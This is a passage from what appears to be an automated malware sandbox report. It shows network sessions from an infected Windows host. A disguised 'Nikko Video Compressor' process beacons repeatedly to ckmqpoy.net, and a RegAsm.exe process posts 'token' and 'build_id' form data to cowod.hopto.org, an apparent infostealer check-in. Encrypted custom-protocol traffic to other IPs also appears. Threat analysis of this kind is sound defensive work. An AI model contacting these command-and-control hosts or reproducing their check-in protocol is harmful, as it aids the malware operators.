Sep 21, 2024 14:49:30.781959057 CEST	448	IN	Data Raw: d1 ea e2 69 68 04 00 07 2e 7b 9a 13 7f a0 9e f6 8c a3 e5 14 6c cf 9c 83 27 93 93 4d bc 34 a7 7e 03 9a 25 6b 69 d6 c4 34 a6 7d 78 60 05 f7 6c 13 19 6f 27 9b ff 7d 6e 23 06 a6 ad 17 73 f5 1a 56 33 5b 94 e3 e1 c8 9e a8 b6 23 a4 dd 50 ee 95 03 5d a2 Data Ascii: ih.{l'M4~%ki4}x`lo'}n#sV3[#P]HHPOUL\R43sAKQzO7+h.Kdj};].1t8L)lz:[N34\H+J.rJ::\|!cK^ILi{4q9hT
Sep 21, 2024 14:49:30.781971931 CEST	1236	IN	Data Raw: 38 f0 57 c6 d3 12 bd 38 73 76 7b 6d 9e b4 38 0a ce b7 9a 22 c0 5a 88 e3 26 ab c7 47 b4 3a 7a c4 d8 c9 08 47 fb ad ff 47 b8 97 9f b4 98 91 c2 6f 40 c8 0b cf dd 42 a5 c6 50 5b 7c 04 e9 8b db d3 a3 54 81 56 ff 18 4a ca 81 df f5 ca 6d 84 16 8a 40 97 Data Ascii: 8W8sv{m8"Z&G:zGGo@BP[\|TVJm@pKWEHjH12Ox$qM)H"N[N,ZV)=dSt53$h2o;4'2wf*^0$Bh"Z
Sep 21, 2024 14:49:30.781984091 CEST	1236	IN	Data Raw: 6a b2 4d 61 13 6d 01 61 3c 5b a5 02 52 d6 fd c8 f0 c7 17 5d 8a 38 36 a1 23 67 46 43 c0 8e fc aa 05 46 45 d1 68 93 e3 84 94 9c dc c1 e4 4f a4 86 0e bd a0 6b e2 30 ca 32 8b 53 02 7b d2 ca 74 02 c2 9c c5 6a b8 32 cb c4 e6 2d 28 d8 69 47 8b c4 71 2a Data Ascii: jMama<[R]86#gFCFEhOk02S{tj2-(iGq*}px{6w4D~\_ssI/p$J`ClbR6oS]&pE$0>TB<9;yIEo@0'=GBp~4baql'I"
Sep 21, 2024 14:49:30.781996965 CEST	1236	IN	Data Raw: 1a 4f f1 ed e3 5a e0 b2 58 58 e0 67 bf 55 38 cc 49 e2 2f d3 4e 16 14 cf f3 b6 c8 e6 9d 34 44 97 81 25 ad 11 f1 62 8b c9 83 39 ea 9d 85 69 76 7c 8d 64 81 df 2b e1 8a 14 82 d3 ff 64 42 e0 be df ac 2b 54 0e 9a 4d 27 aa 61 2b 46 45 15 ab aa 03 5e 62 Data Ascii: OZXXgU8I/N4D%b9iv\|d+dB+TM'a+FE^b0]CU$OWek`@&l2#q7]0Yl`e.q(:gH!Pp+[S56T{1`lTR;rs[.q .bXH**Bc7y
Sep 21, 2024 14:49:30.782008886 CEST	1236	IN	Data Raw: 46 fa 0c 05 9f 83 b2 75 b9 a2 07 9d e6 b0 d6 4b c2 2c 31 76 cb 10 a4 bd 32 de 57 97 75 00 db 8a df 33 b9 85 4a f2 c3 ef 7f d7 84 d9 e9 ac d6 aa 14 c9 4c d3 3e 16 d6 64 89 26 9e d0 26 ed 2b 54 eb 35 29 42 c7 ec 4e 6b 12 87 c3 f9 f8 41 60 c3 6f 07 Data Ascii: FuK,1v2Wu3JL>d&&+T5)BNkA`ol'Xl)y4_37gxTu,qi#+}}jxbVyKm;@KJ{l[`EJwyHg"cE;%^@[n~{`t<2%n_7?
Sep 21, 2024 14:49:30.782021999 CEST	1236	IN	Data Raw: 65 01 fd c7 76 6f 39 bf d4 a9 92 17 9f a0 db 0d ea 52 ee 22 a1 32 07 97 9a a8 70 c2 bf 88 6e 00 a7 2a 95 d6 36 0e c3 e9 28 64 14 ce 7c 75 29 7b e6 6d 6e 58 1b 52 3e 90 80 bc 6b df d5 2d 6d 13 ab 0e 84 32 1d 85 6a 04 37 96 30 3b 28 ac d9 55 28 98 Data Ascii: evo9R"2pn6(d\|u){mnXR>k-m2j70;(U(_pW9j"H,WX%4#L10XMByP:t+Zk^P}@&I%=EbTcny[\|JKtvry3oVK-
Sep 21, 2024 14:49:30.782035112 CEST	1236	IN	Data Raw: 31 e0 3d 1c ea f2 9c 9c 77 f0 66 7f 4c 03 33 63 6b c3 0c 63 9c b6 c8 56 f9 61 17 15 c0 ea a0 6b 90 f1 54 92 a8 3b 2f 5c 72 29 51 87 5b 77 a4 c6 19 db a1 65 a5 f6 64 00 82 a2 64 d7 d1 cc 46 06 e6 e0 72 bb 16 d3 3d 44 f1 0f 11 c5 b2 3e 56 70 cc 2d Data Ascii: 1=wfL3ckcVakT;/\r)Q[weddFr=D>Vp-8\zE#SU4[="~kU*^3LH%P5Yv`Q{8y6m{?\|d?`,%&&`{B{g(glu(oZ=
Sep 21, 2024 14:49:30.782046080 CEST	1236	IN	Data Raw: 74 3b 6f d1 14 11 96 68 29 79 7d b0 4b 94 a3 6c 30 db e3 41 e4 64 bb ff 94 f0 d1 4b 9d b8 94 4f 0e 7b df a2 e2 a4 d8 0b ff 02 0f 82 7b 8d ea 82 7f f7 0a d9 c6 a1 c4 a9 ef 1f 48 75 5d 0e df de 8c 9e 2a 07 a7 9b 0b ee 3d 5d 9b 49 6a db 26 9f f2 c2 Data Ascii: t;oh)y}Kl0AdKO{{Hu]*=]Ij&[6ZR#@8afKGQS+]-o'zJG-N&&;P:b7KwK`RxO.{FuDEe/':!&Pf\|YU`:m{R6
Sep 21, 2024 14:49:30.782062054 CEST	1236	IN	Data Raw: 41 51 19 17 4c 63 99 a3 6b b3 a7 b6 e2 f2 17 bb 03 44 46 7f 7b 41 27 3a 9c 8a 10 d0 ce 98 25 8a a1 6e d1 4e 50 87 49 4c 72 fb 11 20 92 67 7b 0c 6b 62 9f 69 52 dd 5e 86 bc e7 28 40 76 17 be 5a 24 bc 27 84 47 0d 02 f1 fe 36 db 47 f3 64 ca 38 7f ff Data Ascii: AQLckDF{A':%nNPILr g{kbiR^(@vZ$'G6Gd8in]jH70q<&MV7,iqTv-}~fI&.r1xu/b.ws%5! =_C;E-flQg?"Yju\|X<

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.9	49778	92.119.114.169	80

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:34.159703970 CEST	18	OUT	Data Raw: ad da ba ab 06 00 00 00 16 27 00 00 1a 15 10 1c 17 0d Data Ascii: '
Sep 21, 2024 14:49:34.717413902 CEST	36	IN	Data Raw: ad da ba ab 18 00 00 00 12 27 00 00 3e 40 21 14 41 12 4f 3f 0f 3b 20 3e 32 18 1b 3e 36 0c 12 0d 55 4d 32 0d Data Ascii: '>@!AO?; >2>6UM2
Sep 21, 2024 14:49:34.777734041 CEST	76	IN	Data Raw: ad da ba ab 40 00 00 00 17 27 00 00 1b 48 4c 1b 1d 1b 49 18 4d 1d 4e 1f 4b 4f 4c 1a 1f 4d 1c 1d 4e 1a 4d 4f 4f 4f 41 1f 4d 1a 18 4b 4d 4e 4a 4d 4e 1a 18 4b 1a 1c 4d 18 4e 4f 41 40 1a 1b 41 1d 1b 1b 4b 4c 41 4f 4a 1f 4b 40 4d 18 Data Ascii: @'HLIMNKOLMNMOOOAMKMNJMNKMNOA@AKLAOJK@M
Sep 21, 2024 14:49:35.201200008 CEST	12	OUT	Data Raw: ad da ba ab 00 00 00 00 14 27 00 00 Data Ascii: '
Sep 21, 2024 14:49:35.378941059 CEST	23	IN	Data Raw: ad da ba ab 0b 00 00 00 15 27 00 00 41 57 4d 4f 57 48 4b 4a 57 4a 4a Data Ascii: 'AWMOWHKJWJJ
Sep 21, 2024 14:49:38.531502962 CEST	12	OUT	Data Raw: ad da ba ab 00 00 00 00 10 27 00 00 Data Ascii: '
Sep 21, 2024 14:49:39.152760029 CEST	12	IN	Data Raw: ad da ba ab 00 00 00 00 11 27 00 00 Data Ascii: '

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.9	49782	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:37.187833071 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:37.889983892 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.9	49783	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:39.028721094 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:39.706784964 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.9	49784	45.132.206.251	80	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:39.068356037 CEST	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGDGHCBGDHJJKECAECB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: cowod.hopto.org Content-Length: 3577 Connection: Keep-Alive Cache-Control: no-cache
Sep 21, 2024 14:49:39.068396091 CEST	3577	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 Data Ascii: ------GCGDGHCBGDHJJKECAECBContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------GCGDGHCBGDHJJKECAECBContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------GCGDGHCBGDHJJK
Sep 21, 2024 14:49:39.736877918 CEST	362	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Sat, 21 Sep 2024 12:49:39 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://cowod.hopto.org/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.9	49785	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:39.967276096 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:40.763262987 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.9	49788	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:41.797123909 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:42.461951971 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.9	49790	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:42.754362106 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:43.415050983 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.9	49791	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:44.628139973 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:44.874025106 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.9	49793	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:45.318272114 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:45.981302977 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.9	49795	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:46.294632912 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:46.904652119 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.9	49797	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:47.631428957 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:48.268697977 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.9	49798	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:48.574883938 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:49.232880116 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.9	49800	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:50.220783949 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:50.828046083 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.9	49802	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:51.113765955 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:51.791886091 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.9	49804	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:51.974430084 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:52.656048059 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.9	49806	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:53.964294910 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:54.622642994 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.9	49807	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:55.165139914 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:55.841053963 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.9	49808	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:56.597259998 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:57.301883936 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.9	49809	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:57.570713043 CEST	318	OUT	GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1 Host: ckmqpoy.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 21, 2024 14:49:58.237696886 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 21 Sep 2024 12:49:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.9	49811	185.196.8.214	80	2036	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Timestamp	Bytes transferred	Direction	Data
